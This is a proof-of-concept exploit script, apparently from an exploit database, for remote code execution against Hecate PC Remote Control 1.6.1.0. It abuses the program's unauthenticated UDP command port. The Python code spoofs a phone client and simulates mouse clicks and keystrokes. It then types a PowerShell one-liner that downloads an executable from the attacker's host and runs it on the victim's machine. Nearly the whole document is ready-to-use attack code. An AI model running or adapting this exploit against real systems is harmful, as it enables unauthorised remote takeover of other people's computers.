# Exploit Title: Hecate - PC Remote Control 1.6.1.0 - Remote Code Execution
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://risefall.org
# Software Link:
https://apps.microsoft.com/detail/9mxqtf885mjp?hl=en-US&gl=US
# Version: 1.6.1.0
# Tested on: Windows 10

'''
Description:

Hecate - PC Remote Control 1.6.1.0 listens on UDP port 48436 and accepts
unauthenticated JSON commands for keyboard and mouse input. This lack of
authentication allows a remote attacker to simulate user interaction, open
system dialogs, and execute arbitrary commands.

'''
import socket
import json
import uuid
from datetime import datetime
import time

# Configuration
LHOST = "192.168.8.100"
TARGET_IP = "192.168.8.105"
PORT = 48436
PAYLOAD = "shell.exe"
PHONE_ID = str(uuid.uuid4()).upper()

def send_packet(packet):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(json.dumps(packet).encode('utf-8'), (TARGET_IP, PORT))

def mouse_move_start():
    send_packet({
        "command": "mouseMoveStart",
        "phoneId": PHONE_ID,
        "data": None
    })

def mouse_move(x, y):
    send_packet({
        "command": "mouseMove",
        "phoneId": PHONE_ID,
        "data": {"x": x, "y": y}
    })

def mouse_click():
    send_packet({
        "command": "mouseClick",
        "phoneId": PHONE_ID,
        "data": None
    })

def send_key(key_str):
    send_packet({
        "command": "sendKey",
        "phoneId": PHONE_ID,
        "data": {"key": key_str}
    })

def send_text(text):
    for char in text:
        send_key(char)
        time.sleep(0.08)

def execute_payload():


    mouse_move_start()
    mouse_move(-9999, 9999)
    time.sleep(0.5)
    mouse_move(15, -10)
    time.sleep(0.3)
    mouse_click()
    time.sleep(3)

    print("typing payload..")

    send_text(f"cmd /c powershell -c \"iwr http://{LHOST}/{PAYLOAD}
-OutFile $env:TEMP\\{PAYLOAD}; Start-Process $env:TEMP\\{PAYLOAD}\"")
    time.sleep(0.5)
    send_key("enter")
    print("payload executed check your listener!")

if __name__ == "__main__":

    send_packet({
        "command": "init",
        "phoneId": PHONE_ID,
        "data": {
            "id": PHONE_ID,
            "brand": "ExploitDevice",
            "model": "Exploit",
            "platform": "Android",
            "ip": LHOST,
            "port": PORT,
            "connectedAt": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        }
    })
    time.sleep(2)
    execute_payload()